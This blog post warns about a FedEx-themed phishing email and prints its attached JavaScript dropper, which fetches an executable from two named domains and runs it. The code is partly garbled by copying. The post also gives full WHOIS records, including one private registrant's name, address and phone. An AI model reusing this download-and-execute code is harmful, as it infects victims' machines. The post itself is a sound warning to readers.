Another package of Javascript malware

mon

I wish I were a javascript programmer.

Here’s the code that came to me via email in a .zip file, under the malicious guise of a FedEx delivery label (it was packaged to look like the code you see in my previous post.)

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;

function cwm() { return ‘e’; };

function xn() { return ‘val’; };

function dl(fr) { var b = “dickinsonwrestlingclub.com etqy.com soflectplit(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shell”); var fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er)) { return ‘.c {}; if (dn == 1) break; } }; dl(7) { return ‘om”.s971); dl(6202’; }; var xv = ”; ); dl(613);

for (var rlh=1; rlh<=225; rlh++) { xv += this[‘xn’+rlh](); } this[cwm()+xn()](xv);

The email:

To: info@academyofgreatness.com

Subject: Problems with item delivery, n.00000732560

From: “FedEx International MailService” <seth.mcdowell@77.241.83.157.static.hosted.by.combell.com>

Dear Customer,

We could not deliver your item.

Please, download Delivery Label attached to this email.

Yours faithfully,

Seth Mcdowell,

Operation Manager.

FedEx_ID_00000732560.zip

I have said before and will say cheerfully again, Don’t Open Attachments from People You Don’t Know. Just don’t. Files labelled .zip, .exe, .js, or even .doc, .pdf, and others can be malicious. Sadly, too many people suppress the display of file extensions on their machine, because that’s the default Microsoft has herded people into, and it’s dangerous.

The script above goes out to two websites, “dickinsonwrestlingclub.com” which redirects to a Facebook page, and etqy.com. The registration of the first hides behind a privacy wall:

Domain Name: DICKINSONWRESTLINGCLUB.COM
Registry Domain ID: 336832356_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2015-01-29T00:13:33Z
Creation Date: 2006-02-06T15:11:04Z
Registrar Registration Expiration Date: 2017-02-06T05:00:00Z
Registrar: NETWORK SOLUTIONS, LLC.
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Reseller:
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Street: 12808 Gran Bay Parkway West
Registrant City: Jacksonville
Registrant State/Province: FL
Registrant Postal Code: 32258
Registrant Country: US
Registrant Phone: +1.5707088780
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: h72bn4775k5@networksolutionsprivateregistration.com
Registry Admin ID:
Admin Name: PERFECT PRIVACY, LLC
Admin Organization:
Admin Street: 12808 Gran Bay Parkway West
Admin City: Jacksonville
Admin State/Province: FL
Admin Postal Code: 32258
Admin Country: US
Admin Phone: +1.5707088780
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: h72bn4775k5@networksolutionsprivateregistration.com
Registry Tech ID:
Tech Name: PERFECT PRIVACY, LLC
Tech Organization:
Tech Street: 12808 Gran Bay Parkway West
Tech City: Jacksonville
Tech State/Province: FL
Tech Postal Code: 32258
Tech Country: US
Tech Phone: +1.5707088780
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: h72bn4775k5@networksolutionsprivateregistration.com
Name Server: NS1.CTCTEL.COM
Name Server: NS2.CTCTEL.COM
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/

The second is registered to someone in Turkey:

Domain Name: etqy.com
Registry Domain ID: 1527531270_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.srsplus.com
Registrar URL: http://srsplus.com
Updated Date: 2014-03-13T20:56:39Z
Creation Date: 2008-11-07T19:15:39Z
Registrar Registration Expiration Date: 2015-11-07T19:15:39Z
Registrar: TLDS LLC. d/b/a SRSPlus
Registrar IANA ID: 320
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8773812449
Reseller:
Domain Status: clientTransferProhibited http://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Ferhat Yilmaz
Registrant Organization:
Registrant Street: Hasanpasa Mah. Fahrettin Kerim Gokay Cad. No:26 Kadikoy
Registrant City: Istanbul
Registrant State/Province: none
Registrant Postal Code: 34724
Registrant Country: TR
Registrant Phone: +90.90211
Registrant Phone Ext.:
Registrant Fax:
Registrant Fax Ext.:
Registrant Email: info@etqy.com
Registry Admin ID:
Admin Name: Ferhat Yilmaz
Admin Organization:
Admin Street: Hasanpasa Mah. Fahrettin Kerim Gokay Cad. No:26 Kadikoy
Admin City: Istanbul
Admin State/Province: none
Admin Postal Code: 34724
Admin Country: TR
Admin Phone: +90.90211
Admin Phone Ext.:
Admin Fax:
Admin Fax Ext.:
Admin Email: info@etqy.com
Registry Tech ID:
Tech Name: Ferhat Yilmaz
Tech Organization:
Tech Street: Hasanpasa Mah. Fahrettin Kerim Gokay Cad. No:26 Kadikoy
Tech City: Istanbul
Tech State/Province: none
Tech Postal Code: 34724
Tech Country: TR
Tech Phone: +90.90211
Tech Phone Ext.:
Tech Fax:
Tech Fax Ext.:
Tech Email: info@etqy.com
Name Server: ns51.1and1.com
Name Server: ns52.1and1.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/

The code goes out to these websites and downloads other files, and then runs them. What will happen to your computer next is anyone’s guess. That’s why I wish I knew javascript better, so I could determine exactly what was being downloaded and what it is supposed to do.

Whatever the case, stay away from attachments in your email.

The Old Wolf has spoken.

5 responses to “Another package of Javascript malware”

Pat says:

July 7, 2015 at 5:50 pm

I’m really curious about what kind of a system you have that allows you to open these things without a major catastrophe. Trouble is, I have no understanding of most of what’s in this post. Is there any way you could explain it to somebody who doesn’t speak computer? 😦

- The Old Wolf says:
  
  July 10, 2015 at 6:25 pm
  
  Bottom line is that these attachments are programs, but are designed to look like something else. People who download them and click on them are effectively opening their computers to the bad boys, who then load other programs onto your computer without your permission. And you’re basically toast. The takeaway is to never click on attachments in emails unless you’re 100% sure of what it is and whom it’s from.
  
grumppa says:

July 8, 2015 at 6:13 am

I know you are an intelligent guy but if you google “How can I step through javascript code?”, you get a list of possible javascript debugging tools that you can step through your evil code with and see what values those variables can take. Some of those tools are built in to browsers such as Firefox and Chrome.

Rewriting the javascript code in “standard” form might also help in figuring out what it is doing.

- The Old Wolf says:
  
  July 10, 2015 at 6:23 pm
  
  I’ll check that out, thank you!
  
grumppa says:

July 8, 2015 at 6:14 am

Oh yeah. Don’t let any command which calls eval() or exec() to run, needless to say.